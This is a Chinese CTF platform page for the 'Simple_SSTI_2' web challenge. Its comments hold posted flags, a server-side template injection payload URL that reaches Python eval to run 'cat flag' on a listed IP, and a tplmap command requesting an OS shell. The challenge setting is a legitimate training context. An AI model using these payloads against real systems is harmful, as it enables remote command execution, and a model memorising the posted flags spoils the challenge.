Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 15933
提  示:
描  述:
Simple_SSTI_2
评论
lcplj123 2年前

flag{1a99409e83ac454a0087d8d4b8d7bded}

回复 0

dialog007 2年前

flag{5797b77f958c0d81a37ff4a0128bbe50}

回复 0

saber2k 2年前

flag{8b37299e6a976863ae79c8c173ce7cd1}

回复 0

18096199839 2年前

http://114.67.175.224:12412/?flag={{().__class__.__base__.__subclasses__[177].__init__.__globals__[%27__builtins__%27][%27eval%27](%27__import__(%22os%22).popen(%22cat%20flag%22).read()%27)}} 直接构造

回复 1

tigernolion 2年前

./tplmap.py -u http://114.67.175.224:14305/?flag=123 --os-shell

回复 0

Adaneo 2年前

有点像命令执行

回复 0

Timeover 2年前

全靠大佬

回复 1

342300 2年前

回复 1

zhangcoolcheng 3年前

还是不知道原理

回复 2
ttxs25830 2年前

后端代码中会把flag参数里的字符串用模板引擎渲染出来,这个方法就是让模板引擎以为我们的字符串其实是要执行的代码,大概是这个原理

回复 7

lmzq 3年前

用模板注入 直接用popen类调用os.open()执行系统命令

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

MD 攻破了该题 2天前
call1ng 攻破了该题 2天前
junmoo 攻破了该题 2天前
clannad 攻破了该题 4天前
19513396653 攻破了该题 5天前
HK1ng 攻破了该题 7天前
sun_space 攻破了该题 7天前
ct1640 攻破了该题 8天前
zypts 攻破了该题 9天前
288728 攻破了该题 11天前
看writeup刷题 攻破了该题 12天前
冯123456 攻破了该题 12天前
小城阿扬 攻破了该题 13天前
smtall 攻破了该题 16天前
3028545694 攻破了该题 16天前
15248665739 攻破了该题 18天前
Zzz0529 攻破了该题 19天前
炸鱼饼 攻破了该题 19天前
怀抱晚安 攻破了该题 19天前
tingsi464 攻破了该题 20天前
问题反馈